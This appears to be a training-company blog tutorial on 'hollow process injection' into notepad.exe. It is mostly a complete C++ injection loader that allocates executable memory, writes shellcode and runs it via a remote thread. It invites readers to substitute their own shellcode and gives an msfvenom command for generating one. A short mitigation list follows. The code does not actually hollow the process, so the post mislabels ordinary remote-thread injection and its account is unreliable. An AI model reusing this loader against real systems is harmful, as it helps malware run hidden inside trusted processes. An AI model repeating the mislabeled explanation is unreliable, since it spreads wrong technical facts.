top of page

Demystifying Hollow Process Injection

Hollow Process Injection: Swapping out the engine of a car while it's running – except the car is a computer, and you're the mechanic!

In the realm of cybersecurity and software development, understanding various code injection techniques is paramount and one technique that has gained attention in recent years is Hollow Process Injection.


What is Hollow Process Injection?


In process injection, a new thread or DLL (Dynamic Link Library) containing malicious code is injected into the address space of an existing process and the injected code executes alongside the original program's code.


Hollow Process Injection
Hollow Process Injection

Unlike process injection, hollow process injection suspends a legitimate process, overwrites its existing code section with malicious code, and then resumes the process. Essentially, the attacker creates a "hollowed-out" shell of the original process and injects their code within it.


How Does Hollow Process Injection Work?


Imagine a legitimate program running on your system, like a basic notepad application. Hollow process injection exploits a loophole in how programs operate.


  • Target Selection: The attacker first identifies a target process running on the system. This process is usually a trusted and commonly used application to evade detection.

  • Creating a Suspended Process: The attacker creates a new instance of the target process in a suspended state. This allows them to manipulate the process before it starts executing.

  • Allocating Memory: Next, the attacker allocates memory within the suspended process to hold their malicious payload.

  • Injecting Malicious Code: The attacker injects their malicious code into the allocated memory space of the target process. This code can perform various malicious activities, such as stealing sensitive data, executing additional payloads, or establishing backdoor access.

  • Replacing Legitimate Code: Instead of injecting the code into the process's memory, hollow process injection replaces the legitimate code of the target process with the malicious code while ensuring that the process's execution flow remains intact.

  • Resuming Execution: Finally, the attacker resumes the execution of the modified process, which now runs the malicious code seamlessly alongside its legitimate functionalities

From the outside, the program appears to function normally. However, under the hood, the malicious code is now running with the same privileges as the legitimate process, potentially allowing the attacker to steal data, install malware, or disrupt system operations.


Hollow Process Injection PoC


Below is a program demonstrating hollow process injection using C++. It creates a suspended instance of Notepad.exe, allocates memory inside the process, injects a simple shellcode, creates a remote thread within notepad.exe and resumes the process's execution.


#include <iostream>
#include <Windows.h>

int main()
{
    STARTUPINFO si = { sizeof(si) };
    PROCESS_INFORMATION pi;

    CreateProcess(TEXT("C:\\Windows\\System32\\notepad.exe"), NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);

    // replace this with your actual shellcode
    BYTE shellcode[] = { 0x90,0x90 };

    LPVOID pRemoteBuffer = VirtualAllocEx(pi.hProcess, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    WriteProcessMemory(pi.hProcess, pRemoteBuffer, shellcode, sizeof(shellcode), NULL);

    HANDLE hThread = CreateRemoteThread(pi.hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteBuffer, NULL, 0, NULL);

    WaitForSingleObject(hThread, INFINITE);

    ResumeThread(pi.hThread);

    CloseHandle(hThread);
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);

    std::cout << "Shellcode execution completed successfully." << std::endl;

    return 0;
}

In the above PoC, we can see the internal workflow of a hollow process injection.


  • Target Selection: The attacker creates a target process notepad.exe in the suspended state using the CreateProcess() function.

CreateProcess(TEXT("C:\\Windows\\System32\\notepad.exe"), NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);

  • Allocating Memory: Next, the attacker allocates memory within the suspended notepad.exe process using the VirtuallAllocEx() function to hold the shellcode.

VirtualAllocEx(pi.hProcess, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

  • Injecting Malicious Code: The attacker injects the malicious shellcode into the allocated memory space of the target notepad.exe process using the WriteProcessMemory() function.

WriteProcessMemory(pi.hProcess, pRemoteBuffer, shellcode, sizeof(shellcode), NULL);

  • Create Thread: Attackers create a thread in the target notepad.exe process using the CreateRemoteThread() function to execute the shellcode.

CreateRemoteThread(pi.hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteBuffer, NULL, 0, NULL);

  • Resuming Execution: Finally, the attacker resumes the execution of the modified notepad.exe process using the ResumeThread() function, which now runs the malicious shellcode.

ResumeThread(pi.hThread);

Compile the PoC


Install Visual Studio on your Windows to compile the above C++ program and generate the executable.


vs studio c++ code compile

Note: Replace the shellcode in the above program with your shellcode. You can generate calc.exe shellcode using msfvenom on Kali Linux.


msfvenom -p windows/x64/exec -a x64 cmd=calc.exe -f c -b "\x00"

msfvenom calc.exe shellcode

Execute the PoC


Once the compiled program is created, navigate to the Debug folder within the VS project folder, double-click on the executable and you should be able to see the Calculator program running.


hollow process injecton

How to Mitigate Hollow Process Injection?


To detect hollow process injection and stop the bypass of traditional AV software, follow the below security measures.


  • Apply Security Patches: Patching vulnerabilities in your software can significantly reduce the risk of exploitation.

  • Implement EDR: Using Antivirus and anti-malware software, use EDR solutions to monitor the system process 24/7.

  • Least Privilege: Ensure the principle of least privilege is followed to minimize the risk of system compromise through hollow process injection.

  • Practice User Awareness: Be cautious when opening unknown attachments or clicking suspicious links.


Conclusion


Hollow process injection is a sophisticated code injection technique attackers use to evade detection and carry out malicious activities. By understanding how it works, organizations can be more vigilant and take steps to protect their systems.


 

Register for instructor-led online courses today!


Check out our self-paced courses!


Contact us with your custom pen testing needs at: info@darkrelay.com  or WhatsApp.

51 views

Recent Posts

See All

تعليقات


bottom of page